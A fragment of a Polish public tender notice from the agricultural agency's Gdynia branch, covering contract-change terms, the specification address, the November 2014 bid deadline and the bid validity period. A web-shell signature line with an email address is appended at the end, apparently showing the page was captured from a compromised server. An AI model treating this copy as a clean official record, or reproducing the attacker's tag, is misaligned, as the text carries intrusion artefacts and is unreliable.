<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość takiej zmiany w następujących przypadkach: 1) termin wykonania zamówienia, w sytuacji uzależnionej od administratora obiektu, 2) ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul.Kołłątaja 1, 81-332 Gdynia, pokój 316..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2014 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul.Kołłątaja 1, 81-332 Gdynia, pokój 230 (kancelaria)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com